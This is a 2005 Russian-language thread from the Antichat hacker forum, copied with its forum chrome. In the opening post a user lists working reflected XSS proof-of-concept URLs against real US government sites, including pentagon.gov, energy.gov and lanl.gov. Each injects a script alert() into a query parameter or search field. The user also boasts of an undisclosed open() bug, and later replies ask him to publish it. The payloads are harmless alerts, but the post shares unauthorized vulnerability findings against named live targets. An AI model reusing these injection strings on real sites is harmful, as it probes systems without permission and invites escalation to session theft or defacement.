Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
XSS на сайте "Пентагона". Анархия в зоне "gov". |

01.11.2005, 19:38
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме: 484586
Репутация:
16
|
|
XSS на сайте "Пентагона". Анархия в зоне "gov".
Начал проверять гос. сайты на баги и так сказать, получился неплохой урожай ;-). Куча xss-багов и попался даже древний баг в open(). (Но о нём говорить не буду, т.к. сайт быстро снесут).
От xss конешн, сам понимаю толку никакого. Но всё равно впечатляет.
Начнём с малого:
http://search.access.gpo.gov/GPO/Sea...3C%2Fscript%3E
http://www.prc.gov/interrogatories.asp?irid=38516&irname=%3Cscript%3E alert(%22x%22)%3C/script%3E
http://www.stdgen.lanl.gov/cgi-bin/path_map.cgi?field=gene_id&term=MG142&mode=exact&d bname=%3Cscript%3Ealert(%22x%22)%3C/script%3E
На сайте http://www.energy.gov, поле SEARCH не фильтруется. Вводим туда простейшую конструкцию <script>alert("x")</script>, в результате выскакивает алерт.
И на сайте "немного" покрупнее....На сайте Пентагона.
http://www.pentagon.gov/srch/search?template=%2Fsearch%2Fresults-template-dl.html&c=%3Cscript%3Ealert(%22x%22)%3C/script%3E&c=8268333F54379065&c=6FDF5BD0BF338D19&c= 1DA2190B5E9F39D2&q=%3Cscript%3Ealert%28%22x%22%29% 3C%2Fscript%3E&submit=Search&subcat=briefing+slide s&sort=-pub_date
Последний раз редактировалось Algol; 01.11.2005 в 20:06..
|
|
|

01.11.2005, 19:52
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме: 5581277
Репутация:
1635
|
|
Это ещё раз доказывает что уязвимости есть везде. Но я не думаю что кто-то из наших станет атаковать правительственные сайты, палевно это как-то
|
|
|

01.11.2005, 21:13
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
ого =) давай выкладывай open() в 1 раздел 
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

01.11.2005, 21:19
|
|
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме: 244618
Репутация:
-4
|
|
Может попробывать но Xss не добьешся нечего думаю админы на детскую шутку не купяться.
|
|
|

15.03.2006, 21:50
|
|
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме: 539650
Репутация:
37
|
|
Огого!!! Ни че себе... На пентагоне... !!!!
|
|
|

15.03.2006, 22:13
|
|
Banned
Регистрация: 18.02.2006
Сообщений: 37
Провел на форуме: 565622
Репутация:
52
|
|
|
|
|

16.03.2006, 01:15
|
|
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме: 539650
Репутация:
37
|
|
Блин ... Вы запарили! Не было меня просто долго в сети! А щас наверствываю, то что я пропустил...
|
|
|

16.03.2006, 01:19
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме: 9751364
Репутация:
1847
|
|
А на дату публикации слабо посмотреть?
|
|
|

16.03.2006, 02:40
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме: 1736355
Репутация:
241
|
|
Сообщение от CinerX
Блин ... Вы запарили! Не было меня просто долго в сети! А щас наверствываю, то что я пропустил...
Чем наверстываеш? Флеймом? Нах так гнусно набивать се рейтинг? А насчет небыло в сети, посмотри на дату поста и на дату своей регистрации....
CLOSED
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|